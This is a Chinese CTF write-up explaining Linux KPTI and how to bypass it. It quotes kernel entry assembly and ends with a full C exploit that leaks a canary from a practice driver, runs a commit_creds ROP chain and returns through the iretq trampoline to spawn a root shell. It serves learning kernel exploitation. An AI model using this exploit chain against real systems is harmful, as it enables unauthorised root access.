KPTI
KPTI描述内容摘录自ctf wiki
KPTI 机制最初的主要目的是为了缓解 KASLR 的绕过以及 CPU 侧信道攻击。
在 KPTI 机制中,内核态空间的内存和用户态空间的内存的隔离进一步得到了增强。
内核态中的页表包括用户空间内存的页表和内核空间内存的页表。
用户态的页表只包括用户空间内存的页表以及必要的内核空间内存的页表,如用于处理系统调用、中断等信息的内存。
在 x86_64 的 PTI 机制中,内核态的用户空间内存映射部分被全部标记为不可执行。也就是说,之前不具有 SMEP 特性的硬件,如果开启了 KPTI 保护,也具有了类似于 SMEP 的特性。此外,SMAP 模拟也可以以类似的方式引入,只是现在还没有引入。因此,在目前开启了 KPTI 保护的内核中,如果没有开启 SMAP 保护,那么内核仍然可以访问用户态空间的内存,只是不能跳转到用户态空间执行 Shellcode。
Linux 4.15 中引入了 KPTI 机制,并且该机制被反向移植到了 Linux 4.14.11,4.9.75,4.4.110。
内核如何从内核态页表切换到用户态页表
通过 SWITCH_TO_USER_CR3_STACK 宏实现从内核态页表切换到用户态页表
SWITCH_TO_USER_CR3_STACK宏 实现原理
/*
 * SWITCH_TO_USER_CR3_STACK - switch CR3 to the user page tables.
 *
 * scratch_reg: register the caller allows this macro to clobber.
 *
 * A second scratch register is needed internally; %rax is used for that
 * and is saved/restored around the switch with pushq/popq, so this
 * variant needs a usable stack.
 */
.macro SWITCH_TO_USER_CR3_STACK scratch_reg:req
    pushq   %rax
    SWITCH_TO_USER_CR3_NOSTACK scratch_reg=\scratch_reg scratch_reg2=%rax
    popq    %rax
.endm

/*
 * SWITCH_TO_USER_CR3_NOSTACK - switch CR3 to the user page tables
 * without touching the stack.
 *
 * scratch_reg:  clobbered; holds the CR3 value being built.
 * scratch_reg2: clobbered; keeps a copy of the original CR3 value while
 *               scratch_reg is masked down to the ASID.
 *
 * The two ALTERNATIVE lines are patched at boot: without X86_FEATURE_PTI
 * the whole macro is skipped (jmp .Lend), and without X86_FEATURE_PCID the
 * ASID/flush handling is skipped (jmp .Lwrcr3).
 */
.macro SWITCH_TO_USER_CR3_NOSTACK scratch_reg:req scratch_reg2:req
    ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI
    mov     %cr3, \scratch_reg

    ALTERNATIVE "jmp .Lwrcr3_\@", "", X86_FEATURE_PCID

    /*
     * Test if the ASID needs a flush.
     */
    movq    \scratch_reg, \scratch_reg2
    andq    $(0x7FF), \scratch_reg          /* mask ASID */
    bt      \scratch_reg, THIS_CPU_user_pcid_flush_mask
    jnc     .Lnoflush_\@

    /* Flush needed, clear the bit */
    btr     \scratch_reg, THIS_CPU_user_pcid_flush_mask
    movq    \scratch_reg2, \scratch_reg     /* restore the full CR3 value */
    jmp     .Lwrcr3_pcid_\@

.Lnoflush_\@:
    movq    \scratch_reg2, \scratch_reg     /* restore the full CR3 value */
    SET_NOFLUSH_BIT \scratch_reg

.Lwrcr3_pcid_\@:
    /* Flip the ASID to the user version */
    orq     $(PTI_USER_PCID_MASK), \scratch_reg

.Lwrcr3_\@:
    /* Flip the PGD to the user version */
    orq     $(PTI_USER_PGTABLE_MASK), \scratch_reg
    mov     \scratch_reg, %cr3
.Lend_\@:
.endm
引用自arttnba3
众所周知 Linux 采用四级页表结构(PGD->PUD->PMD->PTE),而 CR3 控制寄存器用以存储当前的 PGD 的地址,因此在开启 KPTI 的情况下用户态与内核态之间的切换便涉及到 CR3 的切换,为了提高切换的速度,内核将内核空间的 PGD 与用户空间的 PGD 两张页全局目录表放在一段连续的内存中(两张表,一张一页4k,总计8k,内核空间的在低地址,用户空间的在高地址),这样只需要翻转 CR3 的第 13 位(从 1 开始计数,即 bit 12,值为 0x1000)便能完成页表切换的操作;上面的宏在切换到用户态页表时,正是通过 orq $(PTI_USER_PGTABLE_MASK) 将该位置 1
SWITCH_TO_USER_CR3_STACK宏 在哪些地方使用
在系统调用、中断处理处使用(都需要从内核态切换到用户态),如下是省略的系统调用entry_SYSCALL_64
代码
/*
 * Abridged excerpt of the 64-bit SYSCALL entry point ([...] marks elided
 * code). Shown here for its two ways back to user mode: the three jne
 * branches to swapgs_restore_regs_and_return_to_usermode, and the
 * fall-through SYSRET path at the bottom.
 */
SYM_CODE_START(entry_SYSCALL_64)
    UNWIND_HINT_EMPTY

    swapgs
    [...]
    cmpq    $__USER_CS, CS(%rsp)            /* CS must match SYSRET */
    jne     swapgs_restore_regs_and_return_to_usermode  // NOTE: look here <<<<<<<<<<<<<<<<<<<

    movq    R11(%rsp), %r11
    cmpq    %r11, EFLAGS(%rsp)              /* R11 == RFLAGS */
    jne     swapgs_restore_regs_and_return_to_usermode  // NOTE: look here <<<<<<<<<<<<<<<<<<<

    /* nothing to check for RSP */

    cmpq    $__USER_DS, SS(%rsp)            /* SS must match SYSRET */
    jne     swapgs_restore_regs_and_return_to_usermode  // NOTE: look here <<<<<<<<<<<<<<<<<<<
    [...]
    SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi   // <<<<<<<<<<<<<<<<<<<< this macro switches from the kernel page tables to the user page tables

    popq    %rdi
    popq    %rsp
    USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
从代码可知,在系统调用结束、返回到用户态之前,会先通过 SWITCH_TO_USER_CR3_STACK 切换页表,之后再执行如下指令返回到用户态
popq %rdipopq %rspUSERGS_SYSRET64#define USERGS_SYSRET64 \swapgs; \sysretq;
利用 SWITCH_TO_USER_CR3_STACK宏 绕过 KPTI
由于 SWITCH_TO_USER_CR3_STACK 是宏,在 /proc/kallsyms 中不存在其符号地址,因此一般是先获取使用到该宏的函数地址,再加上 SWITCH_TO_USER_CR3_STACK 展开处的偏移作为rop的地址,进行利用
通过entry_SYSCALL_64中的SWITCH_TO_USER_CR3_STACK绕过KPTI
- 先找到 entry_SYSCALL_64 的地址,再通过反汇编工具找到 entry_SYSCALL_64 中 SWITCH_TO_USER_CR3_STACK 展开开始处的地址,将该地址作为rop的一环
- 由于在 entry_SYSCALL_64 内部利用 SWITCH_TO_USER_CR3_STACK,会自动执行到 swapgs; sysretq,需要在rop链中构造 sysretq 切换到用户态时需要的内核栈
  - 设置rcx为用户态rip,设置r11为用户态rflags,设置rsp为一个用户态堆栈(宏展开之后还会先执行 popq %rdi; popq %rsp,因此栈上需要依次放置 rdi 的值和用户态 rsp)
通过swapgs_restore_regs_and_return_to_usermode(trampoline) 绕过 KPTI
再看看entry_SYSCALL_64
的代码
/*
 * Abridged excerpt of the 64-bit SYSCALL entry point ([...] marks elided
 * code). The [1] / [2] prefixes are annotation markers used by the
 * surrounding text, not part of the kernel source:
 *   [1] branches taken when the saved frame cannot be returned via SYSRET
 *   [2] the normal exit: page-table switch followed by SYSRET
 */
SYM_CODE_START(entry_SYSCALL_64)
    UNWIND_HINT_EMPTY

    swapgs
    [...]
    cmpq    $__USER_CS, CS(%rsp)            /* CS must match SYSRET */
[1] jne     swapgs_restore_regs_and_return_to_usermode  // NOTE: look here <<<<<<<<<<<<<<<<<<<

    movq    R11(%rsp), %r11
    cmpq    %r11, EFLAGS(%rsp)              /* R11 == RFLAGS */
[1] jne     swapgs_restore_regs_and_return_to_usermode  // NOTE: look here <<<<<<<<<<<<<<<<<<<

    /* nothing to check for RSP */

    cmpq    $__USER_DS, SS(%rsp)            /* SS must match SYSRET */
[1] jne     swapgs_restore_regs_and_return_to_usermode  // NOTE: look here <<<<<<<<<<<<<<<<<<<
    [...]
[2] SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi   // <<<<<<<<<<<<<<<<<<<< this macro switches from the kernel page tables to the user page tables

    popq    %rdi
    popq    %rsp
    USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
如果系统调用不出什么意外,是通过 [2] 处的代码从内核态页表切换到用户态页表
当 [1] 处的任一检查不通过时,则跳转到 swapgs_restore_regs_and_return_to_usermode 返回到用户态:其中同样包含了页表切换、swapgs 和 iretq
/*
 * swapgs_restore_regs_and_return_to_usermode - IRET-based return to user mode.
 *
 * Restores the saved registers, copies the IRET frame plus the user RDI
 * onto the trampoline stack, switches CR3 to the user page tables, then
 * executes SWAPGS and INTERRUPT_RETURN (iretq).
 */
SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
#ifdef CONFIG_DEBUG_ENTRY
    /* Assert that pt_regs indicates user mode. */
    testb   $3, CS(%rsp)
    jnz     1f
    ud2
1:
#endif
    POP_REGS pop_rdi=0

    /*
     * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
     * Save old stack pointer and switch to trampoline stack.
     */
    movq    %rsp, %rdi
    movq    PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
    UNWIND_HINT_EMPTY

    /* Copy the IRET frame to the trampoline stack. */
    pushq   6*8(%rdi)       /* SS */
    pushq   5*8(%rdi)       /* RSP */
    pushq   4*8(%rdi)       /* EFLAGS */
    pushq   3*8(%rdi)       /* CS */
    pushq   2*8(%rdi)       /* RIP */

    /* Push user RDI on the trampoline stack. */
    pushq   (%rdi)

    /*
     * We are on the trampoline stack.  All regs except RDI are live.
     * We can do future final exit work right here.
     */
    STACKLEAK_ERASE_NOCLOBBER

    SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi   // <<<<<<<<<<<<<<<<<<<< this macro switches from the kernel page tables to the user page tables

    /* Restore RDI. */
    popq    %rdi
    SWAPGS
    INTERRUPT_RETURN                            // <<<<<<<<<<<<<<<<<<<< iretq

#define INTERRUPT_RETURN    iretq
大佬们说,通过反汇编才能看到细节
先找到swapgs_restore_regs_and_return_to_usermode的地址
/ # cat /proc/kallsyms | grep "swapgs_restore_regs_and_return_to_usermode"
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
.text:FFFFFFFF81200F10
.text:FFFFFFFF81200F10 pop r15 【1】<< swapgs_restore_regs_and_return_to_usermode起始位置
.text:FFFFFFFF81200F12 pop r14
.text:FFFFFFFF81200F14 pop r13
.text:FFFFFFFF81200F16 pop r12
.text:FFFFFFFF81200F18 pop rbp
.text:FFFFFFFF81200F19 pop rbx
.text:FFFFFFFF81200F1A pop r11
.text:FFFFFFFF81200F1C pop r10
.text:FFFFFFFF81200F1E pop r9
.text:FFFFFFFF81200F20 pop r8
.text:FFFFFFFF81200F22 pop rax
.text:FFFFFFFF81200F23 pop rcx
.text:FFFFFFFF81200F24 pop rdx
.text:FFFFFFFF81200F25 pop rsi
.text:FFFFFFFF81200F26 mov rdi, rsp 【2】<< 由于pop较多,会增加rop的长度,一般从这里利用,距离起始位置22
.text:FFFFFFFF81200F29 mov rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32 push qword ptr [rdi+30h]
.text:FFFFFFFF81200F35 push qword ptr [rdi+28h]
.text:FFFFFFFF81200F38 push qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B push qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E push qword ptr [rdi+10h]
.text:FFFFFFFF81200F41 push qword ptr [rdi]
.text:FFFFFFFF81200F43 push rax
.text:FFFFFFFF81200F44 jmp short loc_FFFFFFFF81200F89 【3】
[...]
[...]
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89 pop rax 【3】还需要弹出两个内容
.text:FFFFFFFF81200F8A pop rdi
.text:FFFFFFFF81200F8B call cs:off_FFFFFFFF82040088 【4】swapgs
.text:FFFFFFFF81200F91 jmp cs:off_FFFFFFFF82040080 【5】iretq
- FFFFFFFF81200F10 【1】 swapgs_restore_regs_and_return_to_usermode起始位置
- FFFFFFFF81200F26 【2】由于pop较多,会增加rop的长度,一般从这里利用,距离起始位置22
- FFFFFFFF81200F44 【3】还需要弹出两个内容
- FFFFFFFF81200F8B 【4】swapgs
- FFFFFFFF81200F91 【5】iretq
因此rop链的布局为
pop rdi; ret;
0
prepare_kernel_cred
mov rdi, rax; ret;
commit_creds
swapgs_restore_regs_and_return_to_usermode + 22
0
0
user_rip
user_cs
user_rflags
user_sp
user_ss
由于通过 iretq 返回到用户态时所需的内核栈布局比 sysretq 简单,一般是使用 swapgs_restore_regs_and_return_to_usermode 绕过KPTI
题目解
启用kpti
#!/bin/sh
# Boot the challenge kernel under QEMU with SMEP and SMAP exposed to the guest.
# "pti=on" explicitly requests page-table isolation on the kernel command
# line, so the KPTI setup does not depend on the kernel's automatic choice
# for the emulated CPU model. KASLR stays disabled (nokaslr).
qemu-system-x86_64 \
    -m 1024M \
    -cpu kvm64,+smep,+smap \
    -kernel vmlinuz \
    -initrd initramfs.cpio.gz \
    -hdb flag.txt \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -append "console=ttyS0 pti=on nokaslr quiet panic=1"
先执行绕过smep的exp,段错误
/ $ ./04_exploit_bypass_smep
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x7ae17b2ee0e55b00 @ index 16
[*] saving user land state
[*] trying to overwrite return address with ROP chain
Segmentation fault
/ $
将exp中的rop修改为如下内容
payload[cookie_off++] = cookie;payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = pop_rdi_ret; // return addresspayload[cookie_off++] = 0x0;payload[cookie_off++] = prepare_kernel_cred;payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;payload[cookie_off++] = 0x0;payload[cookie_off++] = commit_creds;payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + 22; // 开始时有很多无用的pop指令,我们只需要回到那些pop指令之后的偏移量payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = user_rip;payload[cookie_off++] = user_cs;payload[cookie_off++] = user_rflags;payload[cookie_off++] = user_sp;payload[cookie_off++] = user_ss;
结果如下
/ $ ./05_exploit_bypass_kpti_with_trampoline
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x25ed2c3e73fecd00 @ index 16
[*] saving user land state
[*] trying to run ROP chain and bypass KPTI with trampoline
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ # id
uid=0 gid=0
完整exp
/*
 * KPTI bypass via the swapgs_restore_regs_and_return_to_usermode trampoline.
 *
 * Flow: open the vulnerable device, leak the stack canary through read(),
 * record the user-mode segment/flag/stack state, then overflow the kernel
 * stack through write() with a ROP chain that elevates credentials and
 * returns to user mode through the trampoline.
 */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

char *VULN_DRV = "/dev/hackme";

void spawn_shell();

int64_t global_fd = 0;
uint64_t cookie = 0;
/* Index (in qwords) of the stack canary inside the leaked/overflowed buffer. */
uint8_t cookie_off = 16;

/* User-mode state captured by save_userland_state(); forms the IRET frame. */
uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t user_rip = (uint64_t) spawn_shell;

/*
 * Fixed kernel addresses. They only hold for the specific kernel image of
 * this challenge booted with nokaslr; re-derive them for any other build.
 */
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;
uint64_t commit_creds = 0xffffffff814c6410;
uint64_t pop_rdi_ret = 0xffffffff815f88ec;
uint64_t mov_rdi_rax_clobber_rsi140_pop1_ret = 0xffffffff816bf203;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10;

/* Open the vulnerable device read/write; exits the process on failure. */
void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[!] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

/*
 * Read past the driver's buffer and pick the canary out of the leaked
 * qwords. Exits if the read fails or the canary slot is zero.
 */
void leak_cookie() {
    enum { LEAK_QWORDS = 40 };
    /* Zero-initialised so a short read cannot leave garbage in the canary slot. */
    uint64_t leak[LEAK_QWORDS] = {0};

    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t got = read(global_fd, leak, sizeof(leak));
    if (got < 0) {
        perror("[-] read");
        exit(-1);
    }

    cookie = leak[cookie_off];
    printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
    if (!cookie) {
        puts("[-] failed to leak stack canary!");
        exit(-1);
    }
}

/*
 * User-mode landing point of the ROP chain (user_rip). Verifies that the
 * process now runs as uid 0 and starts a shell; never returns.
 */
void spawn_shell() {
    puts("[+] returned to user land");
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] got root (uid = %d)\n", uid);
    } else {
        printf("[!] failed to get root (uid: %d)\n", uid);
        exit(-1);
    }
    puts("[*] spawning shell");
    system("/bin/sh");
    exit(0);
}

/*
 * Capture CS, SS, RSP and RFLAGS of the current user context into the
 * user_* globals so they can be replayed in the IRET frame.
 *
 * NOTE(review): the asm refers to the globals by symbol name, which
 * presumably requires a static / non-PIE build -- confirm the build flags.
 */
void save_userland_state() {
    puts("[*] saving user land state");
    __asm__(".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax");
}

/*
 * Build the overflow payload and send it to the driver. On success the
 * kernel never returns from write(); control resumes in spawn_shell().
 */
void overwrite_ret() {
    enum { PAYLOAD_QWORDS = 35 };
    /* Zero-initialised so the qwords below the canary are not stack garbage. */
    uint64_t payload[PAYLOAD_QWORDS] = {0};
    size_t off = cookie_off;

    puts("[*] trying to run ROP chain and bypass KPTI with trampoline");

    payload[off++] = cookie;
    /* Three filler qwords between the canary and the saved return address. */
    payload[off++] = 0x0;
    payload[off++] = 0x0;
    payload[off++] = 0x0;
    payload[off++] = pop_rdi_ret; // return address
    payload[off++] = 0x0;         // rdi = 0 for prepare_kernel_cred
    payload[off++] = prepare_kernel_cred;
    payload[off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;
    payload[off++] = 0x0;         // filler, presumably for the gadget's extra pop ("pop1" in its name)
    payload[off++] = commit_creds;
    payload[off++] = swapgs_restore_regs_and_return_to_usermode + 22; // skip the run of pops at the start of the routine and enter right after them
    payload[off++] = 0x0;         // consumed by "pop rax" in the trampoline tail
    payload[off++] = 0x0;         // consumed by "pop rdi" in the trampoline tail
    /* IRET frame: RIP, CS, RFLAGS, RSP, SS. */
    payload[off++] = user_rip;
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;

    ssize_t written = write(global_fd, payload, sizeof(payload));
    if (written < 0) {
        perror("[-] write");
    }

    puts("[-] if you can read this we failed the mission :(");
}

int main(int argc, char **argv) {
    open_dev();
    leak_cookie();
    save_userland_state();
    overwrite_ret();
    return 0;
}
参考
https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development/kernel-page-table-isolation-kpti
https://github.com/torvalds/linux/blob/7587a4a5a4f66293e13358285bcbc90cc9bddb31/arch/x86/entry/entry_64.S#L575
https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/kpti/#switch_to_user_cr3_stack
https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep#bypassing-smepkpti-via-rop
https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#version-1-trampoline-goes-weeeh